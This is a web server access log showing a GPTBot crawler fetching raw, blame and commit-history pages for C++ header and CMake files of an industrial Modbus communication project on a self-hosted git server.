[Length 10084] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:07:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:07:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11520] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:16:07:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:16:07:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:07:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10083] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:07:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11167] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:16:07:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 10236] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:16:07:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9952] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:16:07:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 122] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:16:07:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 13025] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:16:07:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12510] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:07:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:16:07:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11822] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:07:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 11433] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:07:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 1182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:16:07:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 10244] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:16:07:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:07:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10083] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:07:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:07:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12761] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:07:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 10242] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:16:07:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:16:07:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 10242] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:16:07:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 10248] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:16:07:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 122] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:16:07:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 9996] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:16:07:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 10522] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:16:07:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:16:07:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 11430] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:07:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11170] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:16:07:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 1611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:16:07:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 10434] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:16:07:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 13636] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:16:07:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:16:07:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 10229] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:07:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12012] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:07:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12881] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:07:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:16:07:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 1182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:16:07:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 10523] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:16:07:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:07:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10082] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:07:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:07:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 122] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:16:07:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 10522] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:16:07:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11820] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:07:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:16:07:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11316] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 